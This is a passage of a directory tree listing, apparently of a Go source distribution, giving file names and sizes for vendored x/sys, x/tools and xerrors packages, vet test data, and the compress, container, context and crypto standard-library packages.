│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_ppc64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_ppc64le.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_ppc.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_riscv64.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_s390x.go
│ │ │ │ │ │ │ ├── [ 12K] ztypes_linux_sparc64.go
│ │ │ │ │ │ │ ├── [7.4K] ztypes_netbsd_386.go
│ │ │ │ │ │ │ ├── [7.6K] ztypes_netbsd_amd64.go
│ │ │ │ │ │ │ ├── [7.6K] ztypes_netbsd_arm64.go
│ │ │ │ │ │ │ ├── [7.6K] ztypes_netbsd_arm.go
│ │ │ │ │ │ │ ├── [9.5K] ztypes_openbsd_386.go
│ │ │ │ │ │ │ ├── [9.4K] ztypes_openbsd_amd64.go
│ │ │ │ │ │ │ ├── [9.3K] ztypes_openbsd_arm64.go
│ │ │ │ │ │ │ ├── [9.4K] ztypes_openbsd_arm.go
│ │ │ │ │ │ │ ├── [9.3K] ztypes_openbsd_mips64.go
│ │ │ │ │ │ │ ├── [7.1K] ztypes_solaris_amd64.go
│ │ │ │ │ │ │ └── [6.6K] ztypes_zos_s390x.go
│ │ │ │ │ │ └── [4.0K] windows
│ │ │ │ │ │ ├── [ 314] aliases.go
│ │ │ │ │ │ ├── [ 12K] dll_windows.go
│ │ │ │ │ │ ├── [ 329] empty.s
│ │ │ │ │ │ ├── [1.2K] env_windows.go
│ │ │ │ │ │ ├── [ 843] eventlog.go
│ │ │ │ │ │ ├── [4.6K] exec_windows.go
│ │ │ │ │ │ ├── [1.4K] memory_windows.go
│ │ │ │ │ │ ├── [2.1K] mkerrors.bash
│ │ │ │ │ │ ├── [1.3K] mkknownfolderids.bash
│ │ │ │ │ │ ├── [ 386] mksyscall.go
│ │ │ │ │ │ ├── [ 478] race0.go
│ │ │ │ │ │ ├── [ 614] race.go
│ │ │ │ │ │ ├── [ 52K] security_windows.go
│ │ │ │ │ │ ├── [9.9K] service.go
│ │ │ │ │ │ ├── [ 67K] setupapi_windows.go
│ │ │ │ │ │ ├── [ 522] str.go
│ │ │ │ │ │ ├── [3.3K] syscall.go
│ │ │ │ │ │ ├── [ 74K] syscall_windows.go
│ │ │ │ │ │ ├── [ 875] types_windows_386.go
│ │ │ │ │ │ ├── [ 817] types_windows_amd64.go
│ │ │ │ │ │ ├── [ 817] types_windows_arm64.go
│ │ │ │ │ │ ├── [ 875] types_windows_arm.go
│ │ │ │ │ │ ├── [ 98K] types_windows.go
│ │ │ │ │ │ ├── [923K] zerrors_windows.go
│ │ │ │ │ │ ├── [ 19K] zknownfolderids_windows.go
│ │ │ │ │ │ └── [183K] zsyscall_windows.go
│ │ │ │ │ ├── [4.0K] term
│ │ │ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ │ │ ├── [ 21] codereview.cfg
│ │ │ │ │ │ ├── [ 913] CONTRIBUTING.md
│ │ │ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ │ ├── [ 727] README.md
│ │ │ │ │ │ ├── [1.8K] term.go
│ │ │ │ │ │ ├── [ 23K] terminal.go
│ │ │ │ │ │ ├── [1.1K] term_plan9.go
│ │ │ │ │ │ ├── [ 399] term_unix_bsd.go
│ │ │ │ │ │ ├── [2.4K] term_unix.go
│ │ │ │ │ │ ├── [ 356] term_unix_other.go
│ │ │ │ │ │ ├── [1.2K] term_unsupported.go
│ │ │ │ │ │ └── [2.1K] term_windows.go
│ │ │ │ │ ├── [4.0K] tools
│ │ │ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ │ │ ├── [4.0K] cover
│ │ │ │ │ │ │ └── [7.5K] profile.go
│ │ │ │ │ │ ├── [4.0K] go
│ │ │ │ │ │ │ ├── [4.0K] analysis
│ │ │ │ │ │ │ │ ├── [9.1K] analysis.go
│ │ │ │ │ │ │ │ ├── [2.4K] diagnostic.go
│ │ │ │ │ │ │ │ ├── [ 13K] doc.go
│ │ │ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ │ │ ├── [4.0K] analysisflags
│ │ │ │ │ │ │ │ │ │ ├── [ 10K] flags.go
│ │ │ │ │ │ │ │ │ │ └── [2.7K] help.go
│ │ │ │ │ │ │ │ │ └── [4.0K] facts
│ │ │ │ │ │ │ │ │ ├── [9.5K] facts.go
│ │ │ │ │ │ │ │ │ └── [2.8K] imports.go
│ │ │ │ │ │ │ │ ├── [4.0K] passes
│ │ │ │ │ │ │ │ │ ├── [4.0K] asmdecl
│ │ │ │ │ │ │ │ │ │ └── [ 23K] asmdecl.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] assign
│ │ │ │ │ │ │ │ │ │ └── [2.1K] assign.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] atomic
│ │ │ │ │ │ │ │ │ │ └── [2.4K] atomic.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] bools
│ │ │ │ │ │ │ │ │ │ └── [5.7K] bools.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] buildtag
│ │ │ │ │ │ │ │ │ │ ├── [9.2K] buildtag.go
│ │ │ │ │ │ │ │ │ │ └── [4.3K] buildtag_old.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] cgocall
│ │ │ │ │ │ │ │ │ │ └── [ 11K] cgocall.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] composite
│ │ │ │ │ │ │ │ │ │ ├── [3.5K] composite.go
│ │ │ │ │ │ │ │ │ │ └── [1.1K] whitelist.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] copylock
│ │ │ │ │ │ │ │ │ │ └── [9.8K] copylock.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] ctrlflow
│ │ │ │ │ │ │ │ │ │ └── [6.5K] ctrlflow.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] errorsas
│ │ │ │ │ │ │ │ │ │ └── [2.4K] errorsas.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] framepointer
│ │ │ │ │ │ │ │ │ │ └── [2.3K] framepointer.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] httpresponse
│ │ │ │ │ │ │ │ │ │ └── [4.7K] httpresponse.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] ifaceassert
│ │ │ │ │ │ │ │ │ │ ├── [3.1K] ifaceassert.go
│ │ │ │ │ │ │ │ │ │ └── [2.5K] parameterized.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] inspect
│ │ │ │ │ │ │ │ │ │ └── [1.3K] inspect.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ │ │ │ └── [4.0K] analysisutil
│ │ │ │ │ │ │ │ │ │ └── [2.8K] util.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] loopclosure
│ │ │ │ │ │ │ │ │ │ └── [4.1K] loopclosure.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] lostcancel
│ │ │ │ │ │ │ │ │ │ └── [9.0K] lostcancel.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] nilfunc
│ │ │ │ │ │ │ │ │ │ └── [2.0K] nilfunc.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] printf
│ │ │ │ │ │ │ │ │ │ ├── [ 33K] printf.go
│ │ │ │ │ │ │ │ │ │ └── [8.9K] types.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] shift
│ │ │ │ │ │ │ │ │ │ ├── [2.2K] dead.go
│ │ │ │ │ │ │ │ │ │ └── [3.4K] shift.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] sigchanyzer
│ │ │ │ │ │ │ │ │ │ └── [3.7K] sigchanyzer.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] stdmethods
│ │ │ │ │ │ │ │ │ │ └── [7.2K] stdmethods.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] stringintconv
│ │ │ │ │ │ │ │ │ │ └── [5.6K] string.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] structtag
│ │ │ │ │ │ │ │ │ │ └── [8.7K] structtag.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] testinggoroutine
│ │ │ │ │ │ │ │ │ │ └── [4.6K] testinggoroutine.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] tests
│ │ │ │ │ │ │ │ │ │ └── [ 15K] tests.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] unmarshal
│ │ │ │ │ │ │ │ │ │ └── [2.9K] unmarshal.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] unreachable
│ │ │ │ │ │ │ │ │ │ └── [7.6K] unreachable.go
│ │ │ │ │ │ │ │ │ ├── [4.0K] unsafeptr
│ │ │ │ │ │ │ │ │ │ └── [5.1K] unsafeptr.go
│ │ │ │ │ │ │ │ │ └── [4.0K] unusedresult
│ │ │ │ │ │ │ │ │ └── [3.9K] unusedresult.go
│ │ │ │ │ │ │ │ ├── [4.0K] unitchecker
│ │ │ │ │ │ │ │ │ ├── [ 299] unitchecker112.go
│ │ │ │ │ │ │ │ │ └── [ 11K] unitchecker.go
│ │ │ │ │ │ │ │ └── [2.9K] validate.go
│ │ │ │ │ │ │ ├── [4.0K] ast
│ │ │ │ │ │ │ │ ├── [4.0K] astutil
│ │ │ │ │ │ │ │ │ ├── [ 16K] enclosing.go
│ │ │ │ │ │ │ │ │ ├── [ 13K] imports.go
│ │ │ │ │ │ │ │ │ ├── [ 12K] rewrite.go
│ │ │ │ │ │ │ │ │ └── [ 371] util.go
│ │ │ │ │ │ │ │ └── [4.0K] inspector
│ │ │ │ │ │ │ │ ├── [5.5K] inspector.go
│ │ │ │ │ │ │ │ └── [4.8K] typeof.go
│ │ │ │ │ │ │ ├── [4.0K] cfg
│ │ │ │ │ │ │ │ ├── [ 11K] builder.go
│ │ │ │ │ │ │ │ └── [4.2K] cfg.go
│ │ │ │ │ │ │ └── [4.0K] types
│ │ │ │ │ │ │ ├── [4.0K] objectpath
│ │ │ │ │ │ │ │ └── [ 18K] objectpath.go
│ │ │ │ │ │ │ └── [4.0K] typeutil
│ │ │ │ │ │ │ ├── [2.1K] callee.go
│ │ │ │ │ │ │ ├── [ 886] imports.go
│ │ │ │ │ │ │ ├── [ 12K] map.go
│ │ │ │ │ │ │ ├── [2.1K] methodsetcache.go
│ │ │ │ │ │ │ └── [1.6K] ui.go
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ ├── [4.0K] analysisinternal
│ │ │ │ │ │ │ │ └── [ 11K] analysis.go
│ │ │ │ │ │ │ ├── [4.0K] lsp
│ │ │ │ │ │ │ │ └── [4.0K] fuzzy
│ │ │ │ │ │ │ │ ├── [4.7K] input.go
│ │ │ │ │ │ │ │ ├── [ 10K] matcher.go
│ │ │ │ │ │ │ │ └── [7.1K] symbol.go
│ │ │ │ │ │ │ └── [4.0K] typeparams
│ │ │ │ │ │ │ ├── [5.8K] common.go
│ │ │ │ │ │ │ ├── [ 332] enabled_go117.go
│ │ │ │ │ │ │ ├── [ 470] enabled_go118.go
│ │ │ │ │ │ │ ├── [6.6K] normalize.go
│ │ │ │ │ │ │ ├── [4.1K] termlist.go
│ │ │ │ │ │ │ ├── [5.5K] typeparams_go117.go
│ │ │ │ │ │ │ ├── [3.9K] typeparams_go118.go
│ │ │ │ │ │ │ └── [3.6K] typeterm.go
│ │ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ │ └── [1.3K] PATENTS
│ │ │ │ │ └── [4.0K] xerrors
│ │ │ │ │ ├── [4.0K] adaptor.go
│ │ │ │ │ ├── [ 21] codereview.cfg
│ │ │ │ │ ├── [ 784] doc.go
│ │ │ │ │ ├── [ 815] errors.go
│ │ │ │ │ ├── [5.0K] fmt.go
│ │ │ │ │ ├── [1.1K] format.go
│ │ │ │ │ ├── [1.5K] frame.go
│ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ └── [ 282] internal.go
│ │ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ │ ├── [ 122] README
│ │ │ │ │ └── [3.0K] wrap.go
│ │ │ │ └── [3.8K] modules.txt
│ │ │ └── [4.0K] vet
│ │ │ ├── [3.0K] doc.go
│ │ │ ├── [2.2K] main.go
│ │ │ ├── [1.6K] README
│ │ │ └── [4.0K] testdata
│ │ │ ├── [4.0K] asm
│ │ │ │ ├── [ 883] asm1.s
│ │ │ │ └── [ 310] asm.go
│ │ │ ├── [4.0K] assign
│ │ │ │ └── [ 804] assign.go
│ │ │ ├── [4.0K] atomic
│ │ │ │ └── [ 364] atomic.go
│ │ │ ├── [4.0K] bool
│ │ │ │ └── [ 346] bool.go
│ │ │ ├── [4.0K] buildtag
│ │ │ │ ├── [ 483] buildtag2.go
│ │ │ │ ├── [ 362] buildtag3.go
│ │ │ │ ├── [ 292] buildtag4.go
│ │ │ │ ├── [ 314] buildtag5.go
│ │ │ │ ├── [ 241] buildtag6.s
│ │ │ │ ├── [ 320] buildtag7.s
│ │ │ │ └── [ 420] buildtag.go
│ │ │ ├── [4.0K] cgo
│ │ │ │ └── [ 462] cgo.go
│ │ │ ├── [4.0K] composite
│ │ │ │ └── [ 547] composite.go
│ │ │ ├── [4.0K] copylock
│ │ │ │ └── [ 333] copylock.go
│ │ │ ├── [4.0K] deadcode
│ │ │ │ └── [ 320] deadcode.go
│ │ │ ├── [4.0K] httpresponse
│ │ │ │ └── [ 509] httpresponse.go
│ │ │ ├── [4.0K] lostcancel
│ │ │ │ └── [ 475] lostcancel.go
│ │ │ ├── [4.0K] method
│ │ │ │ └── [ 394] method.go
│ │ │ ├── [4.0K] nilfunc
│ │ │ │ └── [ 313] nilfunc.go
│ │ │ ├── [4.0K] print
│ │ │ │ └── [ 27K] print.go
│ │ │ ├── [4.0K] rangeloop
│ │ │ │ └── [ 452] rangeloop.go
│ │ │ ├── [4.0K] shift
│ │ │ │ └── [ 358] shift.go
│ │ │ ├── [4.0K] structtag
│ │ │ │ └── [ 376] structtag.go
│ │ │ ├── [4.0K] tagtest
│ │ │ │ ├── [ 263] file1.go
│ │ │ │ └── [ 265] file2.go
│ │ │ ├── [4.0K] testingpkg
│ │ │ │ └── [ 177] tests.go
│ │ │ ├── [4.0K] unmarshal
│ │ │ │ └── [ 406] unmarshal.go
│ │ │ ├── [4.0K] unsafeptr
│ │ │ │ └── [ 321] unsafeptr.go
│ │ │ └── [4.0K] unused
│ │ │ └── [ 324] unused.go
│ │ ├── [1.5K] cmp.bash
│ │ ├── [4.0K] compress
│ │ │ ├── [4.0K] bzip2
│ │ │ │ ├── [2.0K] bit_reader.go
│ │ │ │ ├── [ 13K] bzip2.go
│ │ │ │ ├── [6.8K] huffman.go
│ │ │ │ ├── [1.8K] move_to_front.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 42K] e.txt.bz2
│ │ │ │ ├── [7.1K] fail-issue5747.bz2
│ │ │ │ ├── [129K] Isaac.Newton-Opticks.txt.bz2
│ │ │ │ ├── [1.0K] pass-random1.bin
│ │ │ │ ├── [1.3K] pass-random1.bz2
│ │ │ │ ├── [ 65] pass-random2.bin
│ │ │ │ ├── [ 125] pass-random2.bz2
│ │ │ │ ├── [2.0K] pass-sawtooth.bz2
│ │ │ │ └── [ 16K] random.data.bz2
│ │ │ ├── [4.0K] flate
│ │ │ │ ├── [9.4K] deflatefast.go
│ │ │ │ ├── [ 20K] deflate.go
│ │ │ │ ├── [6.0K] dict_decoder.go
│ │ │ │ ├── [ 18K] huffman_bit_writer.go
│ │ │ │ ├── [9.8K] huffman_code.go
│ │ │ │ ├── [ 20K] inflate.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 78] huffman-null-max.dyn.expect
│ │ │ │ │ ├── [ 78] huffman-null-max.dyn.expect-noinput
│ │ │ │ │ ├── [8.0K] huffman-null-max.golden
│ │ │ │ │ ├── [ 64K] huffman-null-max.in
│ │ │ │ │ ├── [ 78] huffman-null-max.wb.expect
│ │ │ │ │ ├── [ 78] huffman-null-max.wb.expect-noinput
│ │ │ │ │ ├── [1.7K] huffman-pi.dyn.expect
│ │ │ │ │ ├── [1.7K] huffman-pi.dyn.expect-noinput
│ │ │ │ │ ├── [1.6K] huffman-pi.golden
│ │ │ │ │ ├── [3.6K] huffman-pi.in
│ │ │ │ │ ├── [1.7K] huffman-pi.wb.expect
│ │ │ │ │ ├── [1.7K] huffman-pi.wb.expect-noinput
│ │ │ │ │ ├── [1005] huffman-rand-1k.dyn.expect
│ │ │ │ │ ├── [1.0K] huffman-rand-1k.dyn.expect-noinput
│ │ │ │ │ ├── [1005] huffman-rand-1k.golden
│ │ │ │ │ ├── [1000] huffman-rand-1k.in
│ │ │ │ │ ├── [1005] huffman-rand-1k.wb.expect
│ │ │ │ │ ├── [1.0K] huffman-rand-1k.wb.expect-noinput
│ │ │ │ │ ├── [ 229] huffman-rand-limit.dyn.expect
│ │ │ │ │ ├── [ 229] huffman-rand-limit.dyn.expect-noinput
│ │ │ │ │ ├── [ 252] huffman-rand-limit.golden
│ │ │ │ │ ├── [ 247] huffman-rand-limit.in
│ │ │ │ │ ├── [ 186] huffman-rand-limit.wb.expect
│ │ │ │ │ ├── [ 186] huffman-rand-limit.wb.expect-noinput
│ │ │ │ │ ├── [ 64K] huffman-rand-max.golden
│ │ │ │ │ ├── [ 64K] huffman-rand-max.in
│ │ │ │ │ ├── [ 32] huffman-shifts.dyn.expect
│ │ │ │ │ ├── [ 32] huffman-shifts.dyn.expect-noinput
│ │ │ │ │ ├── [1.8K] huffman-shifts.golden
│ │ │ │ │ ├── [6.4K] huffman-shifts.in
│ │ │ │ │ ├── [ 32] huffman-shifts.wb.expect
│ │ │ │ │ ├── [ 32] huffman-shifts.wb.expect-noinput
│ │ │ │ │ ├── [ 238] huffman-text.dyn.expect
│ │ │ │ │ ├── [ 238] huffman-text.dyn.expect-noinput
│ │ │ │ │ ├── [ 242] huffman-text.golden
│ │ │ │ │ ├── [ 299] huffman-text.in
│ │ │ │ │ ├── [ 231] huffman-text-shift.dyn.expect
│ │ │ │ │ ├── [ 231] huffman-text-shift.dyn.expect-noinput
│ │ │ │ │ ├── [ 231] huffman-text-shift.golden
│ │ │ │ │ ├── [ 253] huffman-text-shift.in
│ │ │ │ │ ├── [ 231] huffman-text-shift.wb.expect
│ │ │ │ │ ├── [ 231] huffman-text-shift.wb.expect-noinput
│ │ │ │ │ ├── [ 238] huffman-text.wb.expect
│ │ │ │ │ ├── [ 238] huffman-text.wb.expect-noinput
│ │ │ │ │ ├── [ 17] huffman-zero.dyn.expect
│ │ │ │ │ ├── [ 17] huffman-zero.dyn.expect-noinput
│ │ │ │ │ ├── [ 51] huffman-zero.golden
│ │ │ │ │ ├── [ 308] huffman-zero.in
│ │ │ │ │ ├── [ 6] huffman-zero.wb.expect
│ │ │ │ │ ├── [ 6] huffman-zero.wb.expect-noinput
│ │ │ │ │ ├── [ 206] null-long-match.dyn.expect-noinput
│ │ │ │ │ └── [ 206] null-long-match.wb.expect-noinput
│ │ │ │ └── [3.6K] token.go
│ │ │ ├── [4.0K] gzip
│ │ │ │ ├── [8.4K] gunzip.go
│ │ │ │ ├── [6.2K] gzip.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 85K] issue6550.gz.base64
│ │ │ ├── [4.0K] lzw
│ │ │ │ ├── [8.0K] reader.go
│ │ │ │ └── [7.9K] writer.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 98K] e.txt
│ │ │ │ ├── [1.5K] gettysburg.txt
│ │ │ │ └── [ 98K] pi.txt
│ │ │ └── [4.0K] zlib
│ │ │ ├── [4.7K] reader.go
│ │ │ └── [5.2K] writer.go
│ │ ├── [4.0K] container
│ │ │ ├── [4.0K] heap
│ │ │ │ └── [3.3K] heap.go
│ │ │ ├── [4.0K] list
│ │ │ │ └── [6.3K] list.go
│ │ │ └── [4.0K] ring
│ │ │ └── [3.1K] ring.go
│ │ ├── [4.0K] context
│ │ │ └── [ 17K] context.go
│ │ ├── [4.0K] crypto
│ │ │ ├── [4.0K] aes
│ │ │ │ ├── [5.7K] aes_gcm.go
│ │ │ │ ├── [5.4K] asm_amd64.s
│ │ │ │ ├── [6.9K] asm_arm64.s
│ │ │ │ ├── [ 24K] asm_ppc64le.s
│ │ │ │ ├── [4.4K] asm_s390x.s
│ │ │ │ ├── [6.5K] block.go
│ │ │ │ ├── [1.7K] cbc_ppc64le.go
│ │ │ │ ├── [1.6K] cbc_s390x.go
│ │ │ │ ├── [2.3K] cipher_asm.go
│ │ │ │ ├── [ 750] cipher_generic.go
│ │ │ │ ├── [1.9K] cipher.go
│ │ │ │ ├── [2.0K] cipher_ppc64le.go
│ │ │ │ ├── [2.6K] cipher_s390x.go
│ │ │ │ ├── [ 29K] const.go
│ │ │ │ ├── [2.4K] ctr_s390x.go
│ │ │ │ ├── [ 23K] gcm_amd64.s
│ │ │ │ ├── [ 22K] gcm_arm64.s
│ │ │ │ ├── [6.7K] gcm_ppc64le.go
│ │ │ │ ├── [ 13K] gcm_ppc64le.s
│ │ │ │ ├── [ 11K] gcm_s390x.go
│ │ │ │ └── [1.1K] modes.go
│ │ │ ├── [4.0K] cipher
│ │ │ │ ├── [5.3K] cbc.go
│ │ │ │ ├── [1.9K] cfb.go
│ │ │ │ ├── [2.5K] cipher.go
│ │ │ │ ├── [2.1K] ctr.go
│ │ │ │ ├── [ 14K] gcm.go
│ │ │ │ ├── [1.5K] io.go
│ │ │ │ ├── [1.6K] ofb.go
│ │ │ │ ├── [ 642] xor_amd64.go
│ │ │ │ ├── [1.3K] xor_amd64.s
│ │ │ │ ├── [ 656] xor_arm64.go
│ │ │ │ ├── [1.5K] xor_arm64.s
│ │ │ │ ├── [2.4K] xor_generic.go
│ │ │ │ ├── [ 645] xor_ppc64x.go
│ │ │ │ └── [2.0K] xor_ppc64x.s
│ │ │ ├── [6.7K] crypto.go
│ │ │ ├── [4.0K] des
│ │ │ │ ├── [6.9K] block.go
│ │ │ │ ├── [4.0K] cipher.go
│ │ │ │ └── [4.5K] const.go
│ │ │ ├── [4.0K] dsa
│ │ │ │ └── [7.2K] dsa.go
│ │ │ ├── [4.0K] ecdsa
│ │ │ │ ├── [ 11K] ecdsa.go
│ │ │ │ ├── [ 542] ecdsa_noasm.go
│ │ │ │ ├── [5.3K] ecdsa_s390x.go
│ │ │ │ ├── [ 871] ecdsa_s390x.s
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 93K] SigVer.rsp.bz2
│ │ │ ├── [4.0K] ed25519
│ │ │ │ ├── [6.9K] ed25519.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ └── [4.0K] edwards25519
│ │ │ │ │ ├── [1.0K] doc.go
│ │ │ │ │ ├── [ 10K] edwards25519.go
│ │ │ │ │ ├── [4.0K] field
│ │ │ │ │ │ ├── [4.0K] _asm
│ │ │ │ │ │ │ ├── [7.3K] fe_amd64_asm.go
│ │ │ │ │ │ │ ├── [ 63] go.mod
│ │ │ │ │ │ │ └── [3.0K] go.sum
│ │ │ │ │ │ ├── [ 410] fe_amd64.go
│ │ │ │ │ │ ├── [ 326] fe_amd64_noasm.go
│ │ │ │ │ │ ├── [5.7K] fe_amd64.s
│ │ │ │ │ │ ├── [ 338] fe_arm64.go
│ │ │ │ │ │ ├── [ 297] fe_arm64_noasm.go
│ │ │ │ │ │ ├── [1.0K] fe_arm64.s
│ │ │ │ │ │ ├── [8.5K] fe_generic.go
│ │ │ │ │ │ └── [ 12K] fe.go
│ │ │ │ │ ├── [ 25K] scalar.go
│ │ │ │ │ ├── [6.3K] scalarmult.go
│ │ │ │ │ └── [3.7K] tables.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 49K] sign.input.gz
│ │ │ ├── [4.0K] elliptic
│ │ │ │ ├── [ 14K] elliptic.go
│ │ │ │ ├── [ 471] export_generate.go
│ │ │ │ ├── [1.9K] gen_p256_table.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] fiat
│ │ │ │ │ │ ├── [ 506] Dockerfile
│ │ │ │ │ │ ├── [9.2K] generate.go
│ │ │ │ │ │ ├── [ 43K] p224_fiat64.go
│ │ │ │ │ │ ├── [3.7K] p224.go
│ │ │ │ │ │ ├── [1.8K] p224_invert.go
│ │ │ │ │ │ ├── [ 91K] p384_fiat64.go
│ │ │ │ │ │ ├── [3.7K] p384.go
│ │ │ │ │ │ ├── [2.1K] p384_invert.go
│ │ │ │ │ │ ├── [167K] p521_fiat64.go
│ │ │ │ │ │ ├── [3.7K] p521.go
│ │ │ │ │ │ ├── [1.8K] p521_invert.go
│ │ │ │ │ │ └── [1.6K] README
│ │ │ │ │ └── [4.0K] nistec
│ │ │ │ │ ├── [ 10K] p224.go
│ │ │ │ │ ├── [ 11K] p384.go
│ │ │ │ │ └── [ 12K] p521.go
│ │ │ │ ├── [4.4K] p224.go
│ │ │ │ ├── [ 40K] p256_asm_amd64.s
│ │ │ │ ├── [ 29K] p256_asm_arm64.s
│ │ │ │ ├── [ 15K] p256_asm.go
│ │ │ │ ├── [ 63K] p256_asm_ppc64le.s
│ │ │ │ ├── [ 63K] p256_asm_s390x.s
│ │ │ │ ├── [ 86K] p256_asm_table.bin
│ │ │ │ ├── [ 335] p256_generic.go
│ │ │ │ ├── [ 40K] p256.go
│ │ │ │ ├── [ 13K] p256_ppc64le.go
│ │ │ │ ├── [ 14K] p256_s390x.go
│ │ │ │ ├── [4.7K] p384.go
│ │ │ │ └── [5.1K] p521.go
│ │ │ ├── [4.0K] hmac
│ │ │ │ └── [4.5K] hmac.go
│ │ │ ├── [4.0K] internal
│ │ │ │ ├── [4.0K] randutil
│ │ │ │ │ └── [ 927] randutil.go
│ │ │ │ └── [4.0K] subtle
│ │ │ │ ├── [1.4K] aliasing_appengine.go
│ │ │ │ └── [1.3K] aliasing.go
│ │ │ ├── [4.0K] md5
│ │ │ │ ├── [4.7K] gen.go
│ │ │ │ ├── [4.4K] md5block_386.s
│ │ │ │ ├── [4.4K] md5block_amd64.s
│ │ │ │ ├── [4.1K] md5block_arm64.s
│ │ │ │ ├── [8.8K] md5block_arm.s
│ │ │ │ ├── [ 314] md5block_decl.go
│ │ │ │ ├── [ 333] md5block_generic.go
│ │ │ │ ├── [5.3K] md5block.go
│ │ │ │ ├── [5.3K] md5block_ppc64x.s
│ │ │ │ ├── [4.3K] md5block_s390x.s
│ │ │ │ └── [4.5K] md5.go
│ │ │ ├── [4.0K] rand
│ │ │ │ ├── [ 366] rand_getentropy.go
│ │ │ │ ├── [1.4K] rand_getrandom.go
│ │ │ │ ├── [ 916] rand.go
│ │ │ │ ├── [ 702] rand_js.go
│ │ │ │ ├── [1.8K] rand_plan9.go
│ │ │ │ ├── [2.1K] rand_unix.go
│ │ │ │ ├── [ 680] rand_windows.go
│ │ │ │ └── [2.3K] util.go
│ │ │ ├── [4.0K] rc4
│ │ │ │ └── [1.9K] rc4.go
│ │ │ ├── [4.0K] rsa
│ │ │ │ ├── [ 11K] pkcs1v15.go
│ │ │ │ ├── [8.4K] pss.go
│ │ │ │ ├── [ 19K] rsa.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 28K] pss-vect.txt.bz2
│ │ │ ├── [4.0K] sha1
│ │ │ │ ├── [5.9K] sha1block_386.s
│ │ │ │ ├── [ 906] sha1block_amd64.go
│ │ │ │ ├── [ 31K] sha1block_amd64.s
│ │ │ │ ├── [ 470] sha1block_arm64.go
│ │ │ │ ├── [3.5K] sha1block_arm64.s
│ │ │ │ ├── [5.5K] sha1block_arm.s
│ │ │ │ ├── [ 255] sha1block_decl.go
│ │ │ │ ├── [ 289] sha1block_generic.go
│ │ │ │ ├── [2.3K] sha1block.go
│ │ │ │ ├── [ 228] sha1block_s390x.go
│ │ │ │ ├── [ 553] sha1block_s390x.s
│ │ │ │ └── [5.9K] sha1.go
│ │ │ ├── [4.0K] sha256
│ │ │ │ ├── [8.2K] sha256block_386.s
│ │ │ │ ├── [ 248] sha256block_amd64.go
│ │ │ │ ├── [ 42K] sha256block_amd64.s
│ │ │ │ ├── [ 415] sha256block_arm64.go
│ │ │ │ ├── [5.7K] sha256block_arm64.s
│ │ │ │ ├── [ 279] sha256block_decl.go
│ │ │ │ ├── [ 305] sha256block_generic.go
│ │ │ │ ├── [2.4K] sha256block.go
│ │ │ │ ├── [ 14K] sha256block_ppc64x.s
│ │ │ │ ├── [ 232] sha256block_s390x.go
│ │ │ │ ├── [ 555] sha256block_s390x.s
│ │ │ │ └── [5.8K] sha256.go
│ │ │ ├── [4.0K] sha512
│ │ │ │ ├── [ 499] sha512block_amd64.go
│ │ │ │ ├── [ 27K] sha512block_amd64.s
│ │ │ │ ├── [ 263] sha512block_decl.go
│ │ │ │ ├── [ 287] sha512block_generic.go
│ │ │ │ ├── [3.3K] sha512block.go
│ │ │ │ ├── [ 15K] sha512block_ppc64x.s
│ │ │ │ ├── [ 232] sha512block_s390x.go
│ │ │ │ ├── [ 555] sha512block_s390x.s
│ │ │ │ └── [8.9K] sha512.go
│ │ │ ├── [4.0K] subtle
│ │ │ │ └── [1.8K] constant_time.go
│ │ │ ├── [4.0K] tls
│ │ │ │ ├── [3.9K] alert.go
│ │ │ │ ├── [9.8K] auth.go
│ │ │ │ ├── [ 25K] cipher_suites.go
│ │ │ │ ├── [ 53K] common.go
│ │ │ │ ├── [3.3K] common_string.go
│ │ │ │ ├── [ 46K] conn.go
